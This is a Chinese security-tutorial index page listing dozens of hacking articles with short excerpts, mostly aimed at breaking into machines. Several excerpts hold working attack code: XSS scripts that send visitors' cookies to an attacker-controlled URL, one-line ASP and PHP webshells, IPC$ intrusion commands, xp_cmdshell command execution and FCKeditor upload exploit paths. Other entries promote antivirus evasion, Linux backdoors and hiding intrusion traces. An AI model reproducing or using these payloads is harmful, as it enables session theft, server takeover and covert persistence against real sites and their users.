安全教程

OStack程序员社区-中国程序员成长平台 › 门户 › 安全›安全教程

RSS

黑客快速入门

今天的内容是获得主机的信息。我们要黑一台主机，首先要了解它的信息，　　包括它的类型，用户列表，目录，端口，漏洞等等。　　首先我们我们要找一台主机来练手，随便挑吧！www.dddd.com(乱说的)第一部，呵呵， ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：153 | 回复：0
有史以来最牛的服务器反黑全集

　Win2k的缺省安装很容易被攻击者取得帐号列表，即使安装了最新的Service ack也是如此。　　方案一　　1.打补丁　　微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用开始-WindowsUpd ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：143 | 回复：0
139入侵简易教程

　　net use\192.168.0.1ipc$Content$nbsp; /user:administrator 　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。　　首先，连接的命令是：　　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：153 | 回复：0
容易被黑客攻击的10个漏洞

　　应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散，但它们也同样会造成很多问题，从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：126 | 回复：0
ASP注入万能登陆密码

《黑客手册》样刊里面，oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码：　　程序代码　　% 　　username=trim(Request.Form(username)) 　　password=trim(Request.Form(password)) 　　sql= ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：150 | 回复：0
高手支招:通过进程抓马

　对于进程这个概念，许多电脑用户都没有给予太多关注。在很多人印象里，只知道结束进程可以杀死程序，至于哪些进程对应哪些程序，究竟什么样的进程该杀，什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：138 | 回复：0
汗颜:黑客居然这样保护自己的电脑

看了你昨天的留言，我才知道原来木马可以用这么多方式传播呀。那我想问你一件事，常在河边走，哪有不湿鞋，你经常黑别人，难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢? 　　就像你说的那样，我也中过木马 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：144 | 回复：0
黑客教你7招秘籍入侵xp系统

　第一招:屏幕保护　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：151 | 回复：0
SQL语句导入导出大全

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -SGNETDATA/GNETDATA -Usa -P' /*********** 导入Excel Select * FROM OpenDataSource( 'Microsoft.Jet.OL ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：237 | 回复：0
让本地连接不再受限

　　本地连接突然受限　　单位局域网中有一台旧计算机，平时安装使用的是Windows XP系统，在该系统环境下该计算机可以正常访问网络;后来，某位同事为了能够在第一时间体验到Windows Vista系统的精彩，特意对该计 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：122 | 回复：0
“QQ反骚扰”开发手记

呆在家中上网聊天实在不是一件惬意的事：每一天打开QQ，迎接我的都是一串一串的广告国庆黄金周，连广告也不放过！：（无奈，打开Visual C++，开始了我的反骚扰之路。首先我面对的问题是：QQ一共有几种广告，我 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：129 | 回复：0
用递归写Win32的文件夹遍历

文件夹遍历技术是一种非常有用的技术，在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。文件夹遍历技术的核心就是使用递归算法，关于递归算法，我这里就不多介绍了，不明白的 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：159 | 回复：0
汇编揭开死循环的神秘面纱

i 首先请大家看这么一个简单的小程序： #includestdio.h voidmain() { inti,b; for(i=0;i=10;&……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：167 | 回复：0
冰河暗涌防不胜防 BIOS下实现的Telnet后门

该项目仅为实验性项目，主要目的是想隐藏一个Telnet后门在主板的BIOS内，并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。项目涉及的相关知识及技术目录 1、实验环 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：140 | 回复：0
asp php XSS获取cookie的代码

scriptdocument.write('img src=http://url/news.asp?msg='+document.cookie+' width=0 height=0 border=0 /');/script news.asp代码： % msg=Request.ServerVariables(QUERY_STRING) testfile=Server.MapPath( ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：156 | 回复：0
一句话木马(asp,php) 总结篇

asp一句话 %execute(request(1))% php一句话 ?php eval($_POST);? aspx一句话 script language=C# runat=server WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(add6bb58e139be10); /……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：155 | 回复：0
判断数据库web是否分离的技巧

得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离，结果不一样就是分离的点评：在实际的渗透过程中，我们常常会困惑数据库和web究竟是否在一台 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：137 | 回复：0
利用windows自带功能做永不被查杀的下载者(超小体积)！

用windows自带功能做永不被查杀，超小体积的下载者！利用windows自带功能做永不被查杀，超小体积的下载者！今天自己搞出来个永不会被杀的下载者好东西就要拿出来和大家分享,,, 把制作过程告诉大家吧.... 看不 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：160 | 回复：0
mysql 读取文件的几种方式及应用

章出处:C.R.S.T 作者:sai52 blog:www.sai52.com 今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。思路都一样，在拥有file权限的前提下，读取 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：152 | 回复：0
phpMyAdmin table参数SQL注入漏洞

影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin的./phpmyadmin/libraries/db_table_exi ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：154 | 回复：0
FCKeditor JSP版漏洞

FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUploadType=ImageCurrentFolder=%2F http://www.xxx.com/fckeditor/editor/file ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：156 | 回复：0
linux下mysql 5.x得到root密码后的另外一种利用方式

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4, ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：170 | 回复：0
asp+js 偷取Cookies源代码

偷取Cookie，通过以下脚本引入一个js，document.write(script src=XX.js/script)，然后js内容为： var code;　　　　　　　　　 var target = http://www.xxx.net/cookie.asp?; info=escape(document.location+@@ ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：160 | 回复：0
木马免杀绝招以及常用的修改方法

常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：149 | 回复：0
弹窗口的流氓软件核心代码

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹程序安装成服务，并设置为自动启动。启动之后写入一段代码到 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：154 | 回复：0
CSRF—攻击与防御

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：166 | 回复：0
黑客入侵网络的五十种方法

现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。　　1.网宽网络有限公司制作的网站基本都有注入漏洞搜索网宽网络　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：149 | 回复：0
实战讲解跨站入侵攻击

很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”，那么什么是 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：155 | 回复：0
关于趋势科技等网站被攻击的分析

一. 首先在网上找到了这次攻击的新闻报道 http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通过GOOGLE搜索到了相关被黑的页面 http://www.google.cn/s ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：127 | 回复：0
linux入侵踪迹隐藏攻略

前言：被警察叔叔请去喝茶时间很痛苦的事情，各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深，是我们必须掌握的基本功。当然，如果管理员真的想搞你而他的功力又足 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：152 | 回复：0
社会工程学入侵三步走

大家一定知道超级黑客凯文·米特尼克吧，深为他的社会工程学所折服，美国国防部、五角大楼、中央情报局、北美防空系统……都是他闲庭信步的地方，没有人怀疑他的真实身份，对于他所想获得的信息如鱼得水，这便是社会 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：153 | 回复：0
linux下留本地后门的两个方法

方法一：setuid的方法，其实8是很隐蔽。看看过程: # ls -l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 - ld-2.7.so lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld- ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：145 | 回复：0
不用引号的字符注入和XSS

在字符型填字游戏中，'和＂往往是决定能否跳出约束进行攻击的关键，于是出现鸟转义字符　，可以把' ＂变成残废....这恰恰帮助我们改变了字符内部结构 SQL Injection 在MYSQL中登陆界面 $db-q ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：129 | 回复：0
黑客攻击数据库的六大手段

普通的黑客从进入到退出一次数据攻击只需用不到10秒钟时间就可完成，这个时间对于数据库管理员来说即使注意到入侵者都几乎不够。因此，在数据被损害很长时间之前，许多数据库攻击都没有被单位注意到。　　令人奇 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：134 | 回复：0
phpcms2008注射0day

中秋节到了，这里我送上phpcms2008的一枚注射漏洞！！希望各位朋友多多支持本站啊~~ 漏洞存在于ask/search.php文件，以下是漏洞代码： if($keywords) { $where .= AND title LIKE '%$keywords%' ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：135 | 回复：0
总结各大高手的提权思路

c: d: e:..... C:Documents and SettingsAll Users「开始」菜单程序看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:Documents and SettingsAll UsersApplication DataSymantecpcAnywh ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：127 | 回复：0
教你SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

XP_CMDSHELL存储过程是执行本机的CMD命令，要求系统登陆有SA权限，也就是说如果获得SQLSERVER的SA命令，那就可以在目标机为所欲为了，知名软件流光使用的应该也是这个存储过程来实现在目标机上的操作。下面是我写 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：138 | 回复：0
对Linux服务器的四种入侵级别

随着Linux企业应用的扩展，有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注，这里根据Linux服务器受到攻击的深度以级别形式列出，并提出不同的解决方案。　　对Linux服务器攻击 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：142 | 回复：0
Cookies欺骗教程（图）

1.什么是Cookies 　　Cookies是一个储存于浏览器目录中的小文本，记录你访问一个特定站点的信息，只能被该站点读回。储存在Cookies中的大部分信息是普通的，如：每一次的击键信息和被访站点的地址等。但是许多Web站 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：228 | 回复：0
教你如何使用Google黑掉Windows服务器

在我的《为什么使用Google扫描安全漏洞》的技巧中，我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和（但愿不会如此！）SQL Server。你能使用它得到服务器的信息、 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：232 | 回复：0